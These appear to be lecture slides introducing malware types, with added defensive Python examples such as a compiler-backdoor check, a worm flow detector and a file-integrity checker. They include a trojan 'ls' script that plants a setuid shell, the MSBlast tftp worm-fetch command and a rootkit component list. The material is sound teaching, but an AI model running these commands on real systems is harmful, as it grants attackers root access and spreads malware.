Introduction to Malware
Dan Fleck, CS469 Security Engineering
Reference: Angelos Stavrou's ISA564 and Computer Security by Bishop

What is Malicious Software?
- Malicious software (a.k.a. malware): software designed to infiltrate or damage a computer system without the owner's informed consent
- Examples: viruses, worms, Trojan horses, spyware, and other malicious and unwanted software
- How about adware?
- "Malware" refers to the intent of the creator rather than to any particular feature
- DRM vs. rootkit (e.g., the Sony CD rootkit)

Why should we care? (three chart slides; source: Symantec Internet Threat Report)

Taxonomy of Malicious Software (diagram slide)

Trapdoor/Backdoor
- Secret entry point into a system
- A specific user identifier or password that circumvents the normal security procedures
- Commonly used by developers
- Could be included in a compiler. Let's see Thompson's compiler.

Thompson's Compiler
1. Modify the compiler so that when it compiles login, login accepts either the user's correct password or a fixed password (the same one for all users).
2. Then modify the compiler again, so that when it compiles a new version of the compiler, the extra code that does step 1 is automatically inserted.
3. Recompile the compiler.
4. Delete the source containing the modification and put the undoctored source back.

The Login Program
  login source -> correct compiler  -> login executable; user password -> logged in
  login source -> doctored compiler -> login executable; magic password or user password -> logged in

The Compiler
  compiler source -> correct compiler  -> compiler executable; login source -> correct login executable
  compiler source -> doctored compiler -> compiler executable; login source -> rigged login executable

Thompson's Lesson
- Verifying the source code isn't always enough!
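The lesson is easier to see with a toy model. The following Python is an added example, not part of the slides: "source" and "binary" are stand-in labels and flags, the magic password is a constructed placeholder, and the check at the end is a diverse double-compiling (DDC) style comparison against an independent compiler, which is one way to detect the doctored build that source review alone cannot.

```python
"""Added example (not from the slides): a toy model of Thompson's compiler
backdoor and a diverse double-compiling (DDC) style check that exposes it.
The representation of "source" and "binary" is constructed for illustration."""
from dataclasses import dataclass

MAGIC_PASSWORD = "magic"   # constructed stand-in for the fixed backdoor password

@dataclass(frozen=True)
class Binary:
    """A compiled program. For a compiler, `rigged` means it re-inserts the
    backdoor; for login, it means the magic password is accepted."""
    kind: str      # "login" or "compiler"
    rigged: bool

LOGIN_SRC = "login source"          # clean login source (what an auditor reads)
COMPILER_SRC = "compiler source"    # clean compiler source (also audited)

def compile_with(compiler: Binary, source: str) -> Binary:
    """Compile a source label with a compiler binary."""
    if compiler.kind != "compiler":
        raise ValueError("not a compiler")
    kind = "login" if source == LOGIN_SRC else "compiler"
    # The doctored compiler recognises both targets and re-inserts the trojan
    # no matter how clean the source it is given (steps 1 and 2 of the slide).
    return Binary(kind, rigged=compiler.rigged)

def login_accepts(login: Binary, given: str, real: str) -> bool:
    """Password check performed by a compiled login binary."""
    if login.kind != "login":
        raise ValueError("not a login binary")
    return given == real or (login.rigged and given == MAGIC_PASSWORD)

def rebuild_from_clean_source(compiler: Binary) -> Binary:
    """Steps 3 and 4 of the slide: recompile the compiler from undoctored source."""
    return compile_with(compiler, COMPILER_SRC)

def ddc_check(suspect: Binary, trusted: Binary) -> bool:
    """Diverse double-compiling: bootstrap the compiler source through an
    independent trusted compiler, then compare with the suspect's self-build.
    True means the builds agree; False flags the discrepancy."""
    stage1 = compile_with(trusted, COMPILER_SRC)
    stage2 = compile_with(stage1, COMPILER_SRC)
    return compile_with(suspect, COMPILER_SRC) == stage2

def demo():
    """Returns (backdoor still open?, rebuilt compiler rigged?, DDC agrees?)."""
    doctored = Binary("compiler", rigged=True)
    # Both source trees are clean, yet the rebuilt compiler and login stay rigged.
    rebuilt = rebuild_from_clean_source(doctored)
    login = compile_with(rebuilt, LOGIN_SRC)
    backdoor_open = login_accepts(login, MAGIC_PASSWORD, "hunter2")
    independent = Binary("compiler", rigged=False)   # e.g. a compiler from another origin
    return backdoor_open, rebuilt.rigged, ddc_check(rebuilt, independent)

if __name__ == "__main__":
    print(demo())   # (True, True, False)
```

The model deliberately keeps the "binary" to a single flag so the chain of trust is visible: once the flag is set, no amount of clean source removes it, and only a compiler that did not descend from the doctored one can tell.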

Logic Bomb
- Embedded in legitimate programs
- Activated when specified conditions are met, e.g., presence/absence of some file; a particular date/time or a particular user
- When triggered, typically damages the system: modifies/deletes files or disks
- Example: a disgruntled employee adds a trigger so that when the employee's salary record is deleted from the DB, all personnel records are deleted as well.
Can you think of other logic bombs?

Trojan Horse
- Program with an expected and a hidden effect
- Appears normal/expected; the hidden effect violates the security policy
- User is tricked into executing the Trojan horse: expects (and sees) the expected behavior, while the hidden effect is performed with the user's authorization
Attacker:
  cat >/homes/victim/ls <<eof
  cp /bin/sh /tmp/.xxsh
  chmod u+s,o+x /tmp/.xxsh
  rm ./ls
  ls $*
  eof
Victim:
  ls

Trojan Horse Example: NetBus
- Designed for Windows NT systems
- Victim uploads and installs it, usually disguised as a game program, or hidden in one
- Acts as a server, accepting and executing commands from a remote "administrator"
- This includes intercepting keystrokes and mouse motions and sending them to the attacker
- Also allows the attacker to upload and download files

Virus
- Program that inserts itself into one or more files and performs some action
- Insertion phase: inserting itself into a file
- Execution phase: performing some (possibly null) action
- Self-replicating code; generally tries to remain undetected
Pseudocode:
  if spread condition then
      for each target file:
          if not infected then alter it to include the virus
  perform malicious action
  execute normal program (step done only by Trojan horses to remain hidden)

Early Virus Reports
- Brain (Pakistani) virus (1986): written for IBM PCs; alters boot sectors of floppies, spreads to other floppies
- MacMag Peace virus (1987): written for the Macintosh; prints a "universal message of peace" on March 2, 1988 and deletes itself

Virus Types
Boot Sector
- Problem: how to ensure the virus "carrier" is executed?
- Solution: place it in the boot sector of the disk; it runs on any boot
- Propagates by altering boot disk creation
- Less common now that few machines boot off floppies
- The Brain virus used this
Executable
- Malicious code placed at the beginning of a legitimate program (EXE or .COM)
- Runs when the application is run

Virus Types
Macro Virus
- Infected "executable" isn't machine code
- Relies on something "executed" inside application data; common example: macros
- Otherwise similar properties to other viruses
- Architecture-independent, application-dependent

Macro Virus Example: Melissa
- Infected Microsoft Word 97 and Word 98 documents on Windows and Macintosh systems
- Invoked when the program opens an infected file
- Installs itself as an "open" macro and copies itself into the Normal template; this way it infects any files that are opened in the future
- Invokes the mail program and sends itself to everyone in the user's address book

Virus Types
Armored
- Encrypts the virus body, so there is no fixed "signature" to detect the virus by
Stealth
- Conceals the infection
- Traps reads and disinfects; lets execute calls load the infected file:
  - Request for file length: return the length of the uninfected file
  - Request to open file: temporarily disinfect the file, and reinfect it on closing
  - Request to load file for execution: load the infected file
Terminate and Stay Resident (TSR)
- Stays active in memory after the application completes
- Allows infection of previously unknown files by trapping calls that execute a program

Virus Types
Polymorphic
- A virus that changes its form each time it inserts itself into another program
- Idea is to prevent signature detection by changing the "signature", i.e., the instructions used for the deciphering routine
- At the instruction level: substitute instructions
- At the algorithm level: different algorithms to achieve the same purpose
- Toolkits to make these exist (Mutation Engine, Trident Polymorphic Engine)

Polymorphic Example
These are different instructions (with different bit patterns) but have the same effect:
- add 0 to register
- subtract 0 from register
- xor 0 with register
- no-op
A polymorphic virus would pick randomly from among these instructions.
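To see why this defeats a plain signature and what a scanner can do about it, here is an added example (Python, not part of the slides). It uses a constructed toy instruction set, not real code: a "signature" is an exact instruction sequence, a mutator swaps each instruction for a random equivalent as the slide describes, and a normalising matcher maps every equivalent back to one canonical form before comparing. The equivalence groups are assumptions chosen to mirror the add 0 / sub 0 / xor 0 / nop example.

```python
"""Added example (not from the slides): why an exact-sequence signature misses
instruction-level polymorphism, and how normalising semantically equivalent
instructions restores the match. Toy instruction strings, constructed here."""
import random

# Groups of instructions with the same effect (constructed toy ISA).
EQUIVALENT = [
    {"add r1, 0", "sub r1, 0", "xor r1, 0", "nop"},   # all leave r1 unchanged
    {"mov r1, 0", "xor r1, r1", "sub r1, r1"},        # all zero r1
]

# Canonical representative for every member of each group.
CANONICAL = {}
for group in EQUIVALENT:
    representative = sorted(group)[0]
    for ins in group:
        CANONICAL[ins] = representative

# Constructed "decryptor stub" whose exact sequence is the scanner's signature.
BODY = ["mov r1, 0", "add r1, 0", "load r2, [r1]", "call decrypt"]
SIGNATURE = tuple(BODY)

def mutate(program, rng):
    """Replace each instruction by a randomly chosen equivalent (instruction-level polymorphism)."""
    out = []
    for ins in program:
        for group in EQUIVALENT:
            if ins in group:
                ins = rng.choice(sorted(group))
                break
        out.append(ins)
    return out

def normalise(program):
    """Map every instruction to its canonical representative."""
    return tuple(CANONICAL.get(ins, ins) for ins in program)

def matches_signature(program, signature=SIGNATURE):
    """Naive exact-sequence match, as a byte-pattern signature would do."""
    n = len(signature)
    return any(tuple(program[i:i + n]) == signature for i in range(len(program) - n + 1))

def matches_normalised(program, signature=SIGNATURE):
    """Match after normalising both the sample and the signature."""
    return matches_signature(list(normalise(program)), normalise(signature))

def demo(seed=7, variants=20):
    """Returns (naive hits, normalised hits) over `variants` mutated copies of BODY."""
    rng = random.Random(seed)
    naive_hits = norm_hits = 0
    for _ in range(variants):
        v = mutate(BODY, rng)
        naive_hits += matches_signature(v)
        norm_hits += matches_normalised(v)
    return naive_hits, norm_hits

if __name__ == "__main__":
    print(demo())
```

The normalising matcher only handles the instruction-level substitutions the slide names; algorithm-level polymorphism (a different decryption algorithm each time) needs emulation or behavioural detection rather than a richer table of equivalences.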

Worm
- Runs independently; does not require a host program
- Propagates a fully working version of itself to other machines
- Carries a payload performing hidden tasks: backdoors, spam relays, DDoS agents, ...
- Phases: Probing -> Exploitation -> Replication -> Payload
So, how is a virus different from a worm?

Worm Propagation (diagram slide)

MSBlast Worm (Aug 2003)
Infected host -> new victim:
1. [infected] Exploits the target on port 135/TCP
2. [victim] Binds svchost.exe to port 4444/TCP via the injected code
3. [infected] Connects to the target on port 4444/TCP
4. [victim] Creates a shell, "cmd.exe", and binds it to port 4444/TCP
5. [infected] Creates a "TFTP Server" on port [number missing on the slide]
6. [infected] Sends the "TFTP" command to the shell
7. [victim] Runs the TFTP command ("tftp –l GET msblast.exe"), transferring the msblast.exe file
8. [infected] Sends the "START msblast.exe" command
9. [victim] Runs the worm on the target
10. [infected] Closes the connection
11. [victim] Shell closes
Firewall rule that blocks step 1:
  TCP protocol; Direction: Inbound; Local end point ports: 135; Application: ANY; Remote End Point: ANY/ANY; Rule valid: ALWAYS; Action: DENY
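The sequence above is also a detection opportunity. The following Python is an added example, not from the slides: it runs over constructed flow records (addresses, timestamps and the record layout are all made up), flags a source that hits 135/tcp, then 4444/tcp, and is then contacted back on the standard TFTP port 69/udp (the port number is an assumption, since the slide omits it), and separately shows which of the same flows the slide's inbound 135/tcp DENY rule would have stopped.

```python
"""Added example (not from the slides): flag the MSBlast-style connection
sequence in flow records and apply the slide's inbound 135/tcp DENY rule.
Flow format, addresses and timestamps are constructed for this example."""
from collections import defaultdict

# Constructed flow records: "<timestamp> <src> <dst> <proto> <dport>"
FLOWS = """\
100 10.0.0.5 10.0.0.9 tcp 135
101 10.0.0.5 10.0.0.9 tcp 4444
103 10.0.0.9 10.0.0.5 udp 69
150 10.0.0.7 10.0.0.9 tcp 445
151 10.0.0.7 10.0.0.9 tcp 4444
300 10.0.0.8 10.0.0.11 tcp 135
400 10.0.0.9 10.0.0.12 tcp 135
401 10.0.0.9 10.0.0.12 tcp 4444
""".splitlines()

def parse_flow(line):
    ts, src, dst, proto, dport = line.split()
    return {"ts": int(ts), "src": src, "dst": dst, "proto": proto, "dport": int(dport)}

# The slide's firewall rule, expressed as data (applied on every host to inbound flows).
RULE = {"proto": "tcp", "local_ports": {135}, "action": "DENY"}

def rule_denies(flow, rule=RULE):
    """True when the slide's rule would drop this inbound flow at the destination host."""
    return flow["proto"] == rule["proto"] and flow["dport"] in rule["local_ports"]

def denied_flows(lines):
    return [line for line in lines if rule_denies(parse_flow(line))]

def find_msblast_sequences(lines, window=60):
    """Return (attacker, victim) pairs where attacker->victim:135/tcp is followed
    within `window` seconds by attacker->victim:4444/tcp and then by
    victim->attacker:69/udp (the TFTP fetch of the worm body; 69 is assumed)."""
    flows = sorted((parse_flow(line) for line in lines), key=lambda f: f["ts"])
    by_pair = defaultdict(list)
    for f in flows:
        by_pair[(f["src"], f["dst"])].append(f)
    hits = []
    for (attacker, victim), forward in by_pair.items():
        backward = by_pair.get((victim, attacker), [])
        for exploit in (f for f in forward if f["proto"] == "tcp" and f["dport"] == 135):
            t0 = exploit["ts"]
            in_window = lambda f: t0 < f["ts"] <= t0 + window
            shell = any(f["proto"] == "tcp" and f["dport"] == 4444 and in_window(f) for f in forward)
            tftp = any(f["proto"] == "udp" and f["dport"] == 69 and in_window(f) for f in backward)
            if shell and tftp:
                hits.append((attacker, victim))
                break
    return hits

if __name__ == "__main__":
    print(find_msblast_sequences(FLOWS))
    print(denied_flows(FLOWS))
```

Note that 10.0.0.9 (the victim) later starts the same 135 then 4444 pattern toward 10.0.0.12 but no TFTP fetch is recorded, so it is not reported; a real detector would want to surface that partial chain too, since it is what the worm's own propagation looks like from the next victim's side.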

Zombie
- Secretly takes over another networked computer by exploiting software flaws
- Builds the compromised computers into a zombie network, or botnet
- Uses it to indirectly launch attacks, e.g., DDoS
Let's see how we create zombies..

How zombies are created (diagram slide: attacker and computers)

Zombie: Steps - 1
- Attacker scans the Internet for unsecured systems that can be compromised

Zombie: Steps - 2
- Attacker secretly installs the zombie agent program, turning the unsecured computers into zombies

Zombie: Steps - 3
- Zombie agents "phone home" and connect to a master server

Zombie: Steps - 4
- Attacker sends commands to the master server to launch a DDoS attack against a targeted system

Zombie: Steps - 5
- Master server sends the signal to the zombies to launch the attack on the targeted system

Zombie: Steps - 6
- Target system is overwhelmed by zombie requests, denying requests from normal users

Rootkit
- "A rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer"
- Goals: hide malicious resources (e.g., processes, files, registry keys, open ports, etc.); provide hidden backdoor access

Linux RootKit III
  Program     Status       Purpose
  ls          Trojaned!    Hide files
  du          Trojaned!    Hide files
  ifconfig    Trojaned!    Hide sniffing
  netstat     Trojaned!    Hide connections
  chfn        Trojaned!    User->r00t
  chsh        Trojaned!    User->r00t
  inetd       Trojaned!    Remote access
  login       Trojaned!    Remote access
  passwd      Trojaned!    User->r00t
  ps          Trojaned!    Hide processes
  top         Trojaned!    Hide processes
  rshd        Trojaned!    Remote access
  syslogd     Trojaned!    Hide logs
  linsniffer               Packet sniffer!
  fix                      File fixer!
  z2                       Zap2 utmp/wtmp/lastlog eraser!
  wted                     wtmp/utmp editor!
  lled                     lastlog editor!
  bindshell                port/shell type daemon!
  tcpd        Trojaned!    Hide connections, avoid denies

Rootkit
- Simple rootkits: modify user programs (ls, ps); detectable by tools like Tripwire
- Sophisticated rootkits: modify the kernel itself; hard to detect from userland
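What "detectable by tools like Tripwire" means in practice is a stored baseline of file hashes, sizes and modes that is compared against the live system. The Python below is an added example, not the slides' or Tripwire's code: it builds a baseline over a constructed temporary directory, simulates the user-space trojaning from the Linux RootKit III list (ls and ps replaced, linsniffer dropped), and reports the differences.

```python
"""Added example (not from the slides): a minimal Tripwire-style integrity
check that catches user-space trojaning of the kind listed for Linux RootKit III.
Paths and file contents are constructed inside a temporary directory."""
import hashlib
import os
import tempfile

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def take_baseline(root):
    """Map relative path -> (sha256, size, permission bits) for every file under root."""
    baseline = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            baseline[os.path.relpath(path, root)] = (sha256_file(path), st.st_size, st.st_mode & 0o7777)
    return baseline

def compare(baseline, root):
    """Return (modified, added, removed) relative paths against a stored baseline."""
    current = take_baseline(root)
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    return modified, added, removed

def demo():
    """Baseline a constructed bin directory, simulate the rootkit, and diff."""
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "bin")
        os.mkdir(bindir)
        for name in ("ls", "ps", "netstat"):
            with open(os.path.join(bindir, name), "w") as f:
                f.write(f"#!/bin/sh\n# constructed stand-in for the real {name}\n")
        baseline = take_baseline(root)          # would be stored on read-only media
        # Simulate the rootkit install: trojan ls and ps, drop the sniffer.
        with open(os.path.join(bindir, "ls"), "a") as f:
            f.write("# hide files\n")
        with open(os.path.join(bindir, "ps"), "a") as f:
            f.write("# hide processes\n")
        with open(os.path.join(bindir, "linsniffer"), "w") as f:
            f.write("# constructed\n")
        return compare(baseline, root)

if __name__ == "__main__":
    print(demo())   # (['bin/ls', 'bin/ps'], ['bin/linsniffer'], [])
```

The check is only as trustworthy as the environment it runs in: the baseline has to be kept where the compromised host cannot rewrite it, and a kernel-level rootkit can feed the checker clean file contents (exactly the stealth trick described under virus types), which is why the slide calls those hard to detect from userland and why comparisons are better run from a trusted boot medium.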

Rootkit Classification (diagram slide)
- Replace apps
- Add code to all apps (see: es.html?issue=62&id=12)
- Replace/modify kernel modules

Rootkit Classification (continued, diagram slide)
- Run the entire OS in a virtual machine

Lessons
- Malware comes in many types and styles
- It's not going away, and it will always hit new platforms as they come out
- We'll need multiple approaches to defend against it
Next up: Malware Defense!